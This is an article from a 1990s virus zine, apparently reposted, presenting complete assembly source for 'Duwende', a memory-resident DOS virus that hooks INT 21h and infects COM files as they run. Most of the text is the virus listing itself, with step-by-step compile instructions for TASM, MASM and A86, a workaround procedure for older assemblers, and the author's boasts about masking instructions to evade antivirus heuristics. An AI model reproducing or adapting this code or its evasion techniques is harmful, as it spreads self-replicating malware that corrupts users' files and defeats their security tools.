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Duwende (ASM)

hexfiles issue 1

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Published in 
 · 31 Oct 2022

Duwende is my attempt to write a short memory resident virus. My only limitation is that it should not be more than one sector or 512 bytes.

Although I did not make an effort to hide the infection, i did mask some instructions so that it won't trigger thunderbyte undocumented dos flag. As result, it is not detected by thunderbyte in low and auto heuristic. AVP and F-Prot detects it as unknown virus if heuristics is used.


 *Thunderbyte high heuristics (not detect by low and auto heuristics) 
DWND409A.COM might be infected by an unknown virus

c No checksum / recovery information (Anti-Vir.Dat) available.
F Suspicious file access. Might be able to infect a file.
M Memory resident code. The program might stay resident in memory.
J Suspicious jump construct. Entry point via chained or indirect
jumps. This is unusual for normal software but common for viruses.

wheres undocumented DOS call?????
its all there for you to see and you cant find it.
what are you? youre not lame but are you blind?????? :)

*F-PROT heuristics
DWND409A.COM contains code which is usually only found in viruses.
- self-relocating code
- undocumented INT calls <<=== ouch! got me. :(
- suspicious self-modification
Please contact Frisk Software International to check if this is
a known false alarm or send us a copy for analysis.

*AVP heuristics not disabled
DWND409A.COM : suspicion Type_ComTSR

What about ViruScan? Forget it. It has no heuristics.

if duwende is encrypted with antidebug these AVs wont find me. wanna bet? its so easy to defeat those code tracers and emulators.... until they get hold of your virus.


watch out for my KAKABAKABA virus in a forthcoming issue and we will go a-swimming and lets give those avs a good time


 -- DUWENDE.ASM STARTS HERE ---------------------------------------- 
; Hex-Files No. 1 December 1997
; Likhang Pilipino! Ipinagmamalaki! Gawa sa Pilipinas!
; my program is short
; short really is a dwarf
; dwarf is called here duwende
; therefore my program is DUWENDE
; Virus : Duwende
; Author: Putoksa Kawayan
; Date : March 15, 1997
; Origin: Metro Manila, Philippines
; How to compile:
; first. cut everything from the start of this file up to
; the line that says "duwende.asm starts here".
; next. goto end of file and cut everything starting from the
; line that says "duwende.asm ends here" up to the end of the file.
; then. save file as duwende.asm
; finally. you need a compiler program. tasm and masm are
; commercial. a86 is shareware, get a copy in internet. what
; compiler you have, i dont know. so choose what is best for you.
; tasm: (2.01) tasm duwende.asm;
; tlink duwende.obj;
; exe2bin duwende.exe
; ** tlink /t aint work because of org 0 **
; masm: (5.00) masm duwende.asm;
; link duwende.obj;
; exe2bin duwende.exe
; (6.00) ml /AT /Zm duwende.asm
; a86: (4.02) a86 duwende.asm
; (2.16) a86 duwende.asm TO
; ** requires minor code fixing. see end of listing **
; lastly. this is virii you know. this virii is tame and lame but
; makes problem. _watch_out_any_hows_ :)
_my_program segment para 'code' ;
assume cs:_my_program,ds:_my_program ;
; structure of dos dta
dta struc ;
_jmp1 db ? ; drive number -> A=01,B=02,...
_jmp2 dw ? ;11 dup (?) ; 11 byte search mask
db 18 dup (?) ; reserved -> for next search
_attr db ? ; attribute
_time dw ? ; time stamp
_date dw ? ; date stamp
_len dw ? ; length low order
_asciiz dw ? ; length high order
namext db 13 dup (0) ; file name
dta ends ;
codlen equ ((_finis-_is_me)+31)/16 ; memory required in para
org 0 ;
_is_me: call $+3 ; welcome to my virii
cld ;
; memry selfrec :< :( :) :>
mov al,-1 ; check: ax = dx = 0xffff
mov bp,100h ;
cbw ;
cwd ; hide undocumented dos from
int 21h ; tbscan
cmp al,dl ; if memry resident
; ax = 0xff00 dx = 0
pop si ; get start offset + 3
je _01 ;
sub di,di ; not resident
mov ax,es ;
dec ax ;
mov ds,ax ;
mov bx,[di+3] ; get mcb length
mov cx,codlen ;
sub bx,cx ;
push cx ;
mov ah,4ah ; release some memory
int 21h ;
mov cl,8 ;
pop bx ;
dec bx ;
mov ah,48h ; alocate memory
int 21h ;
push ax ;
mov es,ax ;
dec ax ;
push cx ;
mov [di+18],ax ; reset top mem
mov ds,ax ;
pop [di+1] ; set mcb owner to dos
push cs ;
pop ds ;
push si ; save start of virii
sub si,3 ;
mov cx,offset _me_dta ; copy virii code to
repe movsb ; mem top
pop si ;
pop ds ;
mov ax,3521h ;
int 21h ; save old dos int
mov _off,bx ;
mov _seg,es ;
mov ah,25h ;
mov dx,offset _is_dos ; set up own dos int
int 21h ;
push cs ;
pop ds ; reset segments
push cs ;
pop es ;
_01: add si,offset _save-3 ; return overwritten victim
_02: mov di,0 ; code and execute victim
add di,bp ; from there. this will make
push di ; generic cleaner inutile
movsb ; esp tbclean
movsw ;
ret ; execute victim
;> <
db 'Duwende' ;> *program name* <
;> <
; my dos int handler
_is_dos:pushf ;
cmp ah,4bh ; only infects on
je _05 ; program load
cmp ax,-1 ; my resident id?
je _04 ;
_03: popf ; execute old dos handler
db 0eah ;
_off dw ? ;
_seg dw ? ;
_04: inc dx ; set dx = 0 al = 0
popf ; resident ID
; my error int handle
_is_err:mov al,0 ;
iret ;
_who_me:and [bx+si+75h],dl ; no one else but me!!!!
jz $+71h ;
db 6bh ; :)
jnb $+63h ;
and [bp+di+61h],cl ; <--- this compile ok
ja $+63h ; in tasm and masm
jns $+63h ; but not in old a86
db 6eh ;
_05: push ax ; save registers used
push cx ;
push dx ;
push bx ;
push si ;
push ds ;
push es ;
mov ah,2fh ; save active dta
int 21h ;
push es ;
push bx ;
push ds ; save victim
push dx ;
push cs ;
pop ds ;
mov dx,offset _me_dta ; set virii dta
mov ah,1ah ;
int 21h ;
mov si,dx ; init pointer
pop dx ; get victim
pop ds ;
mov ah,4eh ; dos find file gives you
mov cx,27h ; drive:attrib:size:date:time
int 21h ; also caps filename
jc _07 ;
push cs ; selfrec on file :>
pop ds ;
mov al,byte ptr [si]._time ; infect check
mov ah,byte ptr [si]._date ;
mov dl,1fh ;
and al,dl ;
jz _06 ; sec = 0 ==> not infected
and ah,dl ;
cmp al,ah ; day <> sec ==> not infected
je _07 ; day = sec ==> infected
_06: mov al,[si]._jmp1 ; get drive number
add al,'A'-1 ;
mov ah,':' ;
mov [si]._asciiz,ax ; set up asciiz
call _inf ;; *my life giver* ;;;
_07: pop dx ;
pop ds ; restore active dta
mov ah,1ah ;
int 21h ;
pop es ; restore registers
pop ds ;
pop si ;
pop bx ;
pop dx ;
pop cx ;
pop ax ;
jmp _03 ; done!!!!
_inf: mov ax,3524h ; save error int
int 21h ;
push es ;
push bx ;
mov ah,25h ; set up own error int
mov dx,offset _is_err ;
push ax ;
int 21h ;
lea dx,[si]._asciiz ; clear attrib
xor cx,cx ;
mov ax,4301h ;
int 21h ;
jc _08 ; write protected?
push dx ;
call _10 ;
pop dx ;
xor ch,ch ;
mov cl,[si]._attr ; restore attrib
mov ax,4301h ;
int 21h ;
_08: pop ax ;
pop dx ; restore old error int
pop ds ;
int 21h ;
_09: ret ;
_10: mov ax,3d02h ; open victim
int 21h ;
jc _09 ;
xchg bx,ax ; save file handle
mov ah,3fh ; read 3 bites from
mov cx,3 ; victim start
lea dx,[si-3] ;
int 21h ;
mov ax,[si-3] ;
cmp al,0e9h ; is it a jmp e9?
jne _11 ; infect near jmp only
mov dx,[si-2] ;
add dx,cx ;
mov cl,0 ; compute where to write
mov ax,4200h ; jmp to virii
push ax ;
push cx ; save offsets for write
push dx ;
int 21h ;
mov word ptr ds:_02+1,ax ;
push ax ; save 3 bites from
mov ah,3fh ; middle of victim
lea dx,[si-3] ;
mov cl,3 ;
int 21h ;
pop dx ;
mov ax,[si]._len ; set up jump to virii
sub ax,cx ;
sub ax,dx ;
mov [si]._jmp1,0e9h ;
mov [si]._jmp2,ax ;
pop dx ;
pop cx ;
pop ax ;
push ax ;
push cx ;
int 21h ;
mov dx,si ; write jmp in the middle
mov cl,3 ; of the file
mov ah,40h ;
int 21h ;
pop cx ; write _my_program
pop ax ; to end of victim
mov dx,[si]._len ;
int 21h ; DUWENDE destroys
mov cx,si ; victim if disk is full
mov ah,40h ; i do not check
int 21h ; error :(
mov ax,[si]._date ;
mov cx,[si]._time ;
mov dx,ax ; make second = day
and al,1fh ; file selfrec
and cl,0e0h ;
or cl,al ;
mov ax,5701h ;
int 21h ;
_11: mov ah,3eh ; done. close file
int 21h ;
ret ;
_save db 90h ; holds victims 3 bites
_save1 dw 20cdh ;
; prog 1st gen init code:
; 90 nop
; cd20 int 20h end exec
_me_dta db 43 dup (?) ; program dta
_finis: ; end label
_my_program ends ;
end _is_me ;
; end _my_progam

-- DUWENDE.ASM ENDS HERE ------------------------------------------

---- Fix for A86 2.16 and prob'ly other versions below 4.xx -----


delete line with "codlen equ ...." near start of code list

replace all "codlen" with 01111
replace all "offset _me_dta" with 02222
replace all "offset _save-3" with 03333
replace "mov offset _02+1,ax" with "mov w[04444],ax
replace "mov _off,bx" with "mov w[05555],bx"
replace "mov _seg,es" with "mov w[06666],es"


insert the following lines immediately after "finis:"

mov ax,((_finis-_is_me)+31)/16
mov bx,offset _me_dta
mov cx,offset _save-3
mov dx,offset _02+1
mov si,offset _off
mov di,offset _seg


place semicolons at start of line of "_who_me:" block
like this:

;_who_me:and [bx+si+75h],dl
; jz $+71h
; db 6bh
; jnb $+63h
; and [bp+di+61h],cl
; ja $+63h
; jns $+63h
; db 6eh

and enter this

_who_me db 020,050,075,074,06f,06b,073,061
db 020,04b,061,077,061,079,061,06e

then compile. load the com created in debug and get the right values.


replace all 01111 with value of ???? in "mov ax,????"
replace all 02222 with value of ???? in "mov bx,????"
replace all 03333 with value of ???? in "mov cx,????"
replace all 04444 with value of ???? in "mov dx,????"
replace all 05555 with value of ???? in "mov si,????"
replace all 06666 with value of ???? in "mov di,????"

recompile and presto you gets the right virus.

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

enjoy my lame virus


Putoksa Kawayan

-- End of File ------------------------------------------------------

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